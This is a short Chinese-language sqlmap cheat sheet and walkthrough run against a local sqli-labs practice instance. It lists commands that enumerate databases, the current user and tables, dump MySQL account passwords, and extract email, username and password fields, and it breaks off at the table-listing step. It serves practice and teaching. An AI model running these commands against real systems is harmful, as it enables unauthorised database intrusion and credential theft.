先把需要用到的命令列一下,方便使用。
sqlmap -u 注入点 –dbs 暴库
sqlmap -u 注入点 –current-user 当前使用的账户
数据库账户与密码
sqlmap -u 注入点 –passwords mysql的登录账户和密码
列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables kaishi(-D指定数据库名称)
列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 –columns
爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword”
开始 sqlmap -u "http://192.168.140.128/sqli-labs-master/Less-1/?id=1" --dbs
这样,所有的数据库就被爆出来了。
接下来查看我们所在的数据库
sqlmap -u "http://192.168.140.128/sqli-labs-master/Less-1/?id=1" --dbms=mysql --current-db
接下来查看数据库中的表